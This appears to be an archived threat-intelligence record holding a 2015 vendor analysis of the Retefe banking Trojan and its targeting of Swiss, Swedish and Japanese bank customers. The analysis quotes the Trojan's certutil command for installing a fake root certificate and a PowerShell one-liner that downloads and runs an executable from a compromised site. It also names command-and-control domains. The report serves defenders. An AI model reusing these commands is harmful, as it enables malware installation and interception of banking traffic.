{
	"id": "f26cc24a-d7d6-451b-8f50-4493c00480b1",
	"created_at": "2026-04-06T00:16:18.493504Z",
	"updated_at": "2026-04-10T13:12:08.068309Z",
	"deleted_at": null,
	"sha1_hash": "6d3516b0d17a1a4220c0c0802591e101d252efe7",
	"title": "Retefe Banking Trojan Targets Sweden, Switzerland and Japan",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 194657,
	"plain_text": "Retefe Banking Trojan Targets Sweden, Switzerland and Japan\r\nBy Brandon Levene, Robert Falcone, Josh Grunzweig, Bryan Lee, Ryan Olson\r\nPublished: 2015-08-20 · Archived: 2026-04-05 20:33:01 UTC\r\nRetefe is one of the most narrowly targeted banking Trojans currently in the wild. While other families such as Zeus and\r\nCitadel are widely adopted by attackers targeting banking websites around the world, Retefe is consistently used\r\nto target victims in Sweden, Switzerland and Japan.\r\nIn the last two weeks we have detected a surge of e-mails using AutoFocus, each carrying the Retefe Trojan and\r\ntargeting organizations in Western Europe and Japan.\r\nFigure 1: AutoFocus map of recent Retefe Trojan recipients\r\nThe attack e-mails are using a variety of “order” and “receipt” themes, each tailored to the country they are\r\ntargeting and using dated file names to make them appear more relevant. The e-mails most often claim to be from\r\na local electronics retailer.\r\nFigure 2: Retefe sample delivered to Swedish target.\r\nOn a global scale, Retefe is a rather small threat, but that appears to be by design. The malware hijacks\r\nconnections to Swiss, Swedish and Japanese financial institutions to assist the attacker in committing fraud. The\r\nmalware carried in the most recent campaigns also downloads and installs the Smoke Loader Trojan, which is a\r\nmodular backdoor capable of stealing credentials and installing additional malware.\r\nhttps://researchcenter.paloaltonetworks.com/2015/08/retefe-banking-trojan-targets-sweden-switzerland-and-japan/\r\nPage 1 of 3\n\nRetefe Behavior\r\nRetefe is different from most banking Trojans, which typically attack web browser software to capture login\r\ncredentials before they are encrypted with SSL and sent to the bank’s web server. Instead, Retefe uses the\r\nWindows PowerShell to execute a series of commands that installs a new root certificate on the system and a\r\nproxy configuration to re-route the traffic to the targeted banking websites.\r\nThe Retefe Trojan writes the root certificate to the disk and then uses the following command to install it on the\r\nsystem.\r\ncertutil -addstore -f -user ROOT ProgramData\\cert512121.der\r\nRetefe has used many certificates in the past, but the latest one is a fake “thawte Inc.” certificate.\r\nFigure 3: Fake “thawte, Inc.” Root Certificate installed by Retefe.\r\nAfter installing the certificate, Retefe makes a request to a server over HTTPS to retrieve JavaScript code that will\r\nreconfigure the system proxy for web browsing to route traffic for specific banking domains through a server\r\ncontrolled by the attacker. The proxy server performs a man-in-the-middle attack against the traffic, decrypting\r\nand possibly modifying the request before re-encrypting the data and passing it on to the bank. Retefe installs the\r\nnew root certificate to prevent users from receiving a notification that the website they are contacting should not\r\nbe trusted.\r\nThe Retefe command and control server appears to only return this proxy configuration code if the infected host is\r\nlocated in Switzerland, Sweden or Japan. Retefe changes command and control servers frequently, but the most\r\nrecent campaigns use domains that mimic the names of VPN services, including:\r\nsecurevpnalarm.net\r\nhsshvpn.net\r\nAfter installing the certificate and reconfiguring the system proxy, Retefe uses another PowerShell command to\r\ndownload an additional executable. In many cases we have identified this malware as a variant of Smoke Loader,\r\na modular backdoor Trojan capable of stealing credentials from the infected system.\r\nRetefe variants download additional malware from multiple URLs, but in most cases the server hosting the\r\nexecutable is a compromised website hosted in the country being targeted by the sample. Below is one example of\r\nthe PowerShell script that initiates the download and executes it.\r\npowershell.exe -Command (New-Object System.Net.WebClient).DownloadFile('http://www.schweizerhof-wetzikon[.]ch/images/rtucrtmirumctrutbitueriumxe/ivotyimoyctorieotcmir.exe' 'ProgramData\\Microsoft-KB512118.exe');(New-Object -com Shell.Application).ShellExecute('ProgramData\\Microsoft-KB512118.exe');\r\nWe suspect the actors behind Retefe began downloading Smoke Loader to help monetize infection of systems\r\noutside of their three targeted nations.\r\nConclusion\r\nWhile Retefe’s distribution is small on a global scale, its attacks are specifically targeted at online banking\r\ncustomers in just a few countries. The most recent campaign shows that Retefe may also threaten users in other\r\ncountries as they begin using their infections to install additional malware.\r\nPalo Alto Networks WildFire identifies Retefe and Smoke Loader samples as malicious and AutoFocus users can\r\nidentify these samples using the SmokeLoader and Retefe tags.\r\nSource: https://researchcenter.paloaltonetworks.com/2015/08/retefe-banking-trojan-targets-sweden-switzerland-and-japan/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA",
		"MITRE"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://researchcenter.paloaltonetworks.com/2015/08/retefe-banking-trojan-targets-sweden-switzerland-and-japan/"
	],
	"report_names": [
		"retefe-banking-trojan-targets-sweden-switzerland-and-japan"
	],
	"threat_actors": [],
	"ts_created_at": 1775434578,
	"ts_updated_at": 1775826728,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/6d3516b0d17a1a4220c0c0802591e101d252efe7.pdf",
		"text": "https://archive.orkl.eu/6d3516b0d17a1a4220c0c0802591e101d252efe7.txt",
		"img": "https://archive.orkl.eu/6d3516b0d17a1a4220c0c0802591e101d252efe7.jpg"
	}
}